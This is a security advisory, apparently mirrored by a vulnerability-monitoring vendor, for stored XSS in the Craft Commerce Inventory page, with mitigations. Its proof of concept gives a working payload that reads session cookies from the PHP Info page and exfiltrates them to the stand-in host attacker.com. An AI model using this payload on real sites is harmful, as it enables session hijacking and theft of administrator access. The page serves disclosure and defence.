Know every vulnerabilitybefore it knows you.
DevGuard continuously monitors your dependencies and alerts you when CVEs like this one affect your stack — with real-time threat intelligence built for developers.
GHSA-cfpv-rmpf-f624
No affected components available
Summary
Stored XSS vulnerabilities exist in the Commerce Inventory page. The Product Title, Variant Title, and Variant SKU fields are rendered without proper HTML escaping, allowing an attacker to execute arbitrary JavaScript when any user (including administrators) views the inventory management page.
This vulnerability enables session hijacking by fetching the PHP Info utility page, which displays unmasked session cookies. Unlike other XSS chains that require elevated sessions, this attack provides instant access to the victim’s session - no additional user interaction or elevated session approval required.
Proof of Concept
Permissions Required
- Access the control panel
- Access Craft Commerce
- Create/Edit products
Steps to Reproduce
- Log in to the control panel
- Navigate to Commerce → Products
- Add a new product and set the Title field to: (replace
https://attacker.com)<img src=x onerror="fetch('/admin/utilities/php-info').then(r=>r.text()).then(t=>{m=t.match(/<th[^>]*>Cookie[^<]*<\/th>\s*<td[^>]*>([\s\S]*?)<\/td>/);if(m)new Image().src='https://attacker.com/s?c='+btoa(m[1])})"> - Save the product
- Navigate to Commerce → Inventory (
/admin/commerce/inventory) - XSS executes, fetches PHP Info page, extracts session cookies, and exfiltrates them to the attacker server
Cookie Extraction Details
The PHP Info page (/admin/utilities/php-info) displays cookie values (unmasked) in multiple locations:
HTTP_COOKIECookie(used in this PoC)$_SERVER['HTTP_COOKIE']$_COOKIE['<cookie-name>']
Notes
- The same vulnerability exists in Variant Title and Variant SKU fields while creating a product. The PoC focuses on Product Title, but the same attack works for the other two fields.
$_COOKIE['CRAFT_CSRF_TOKEN']is masked in PHP Info, but the unmasked value is available in the other parameters listed above.- This vulnerability can also be chained to achieve full database exfiltration or do it after hijacking an administrator session.
Mitigation
- Sanitize product and variant fields when rendering in the inventory template
- Mask sensitive cookie values in the PHP Info utility page (similar to how
CRAFT_CSRF_TOKEN,CRAFT_SECURITY_KEY, andCRAFT_DB_PASSWORDare already masked)
The vulnerability can be exploited over the network without needing physical access. It is easy for an attacker to exploit this vulnerability. An attacker needs basic access or low-level privileges.
Exploitation attempts have been detected. Elevated vigilance and prompt remediation are advised.
The exploit probability is very low. The vulnerability is unlikely to be exploited in the next 30 days.
We did not find any exploit available. Neither in GitHub repositories nor in the Exploit-Database.
Browse More
Continuously monitor your dependencies and get alerted when vulnerabilities like this one affect your stack.
Checkout DevGuard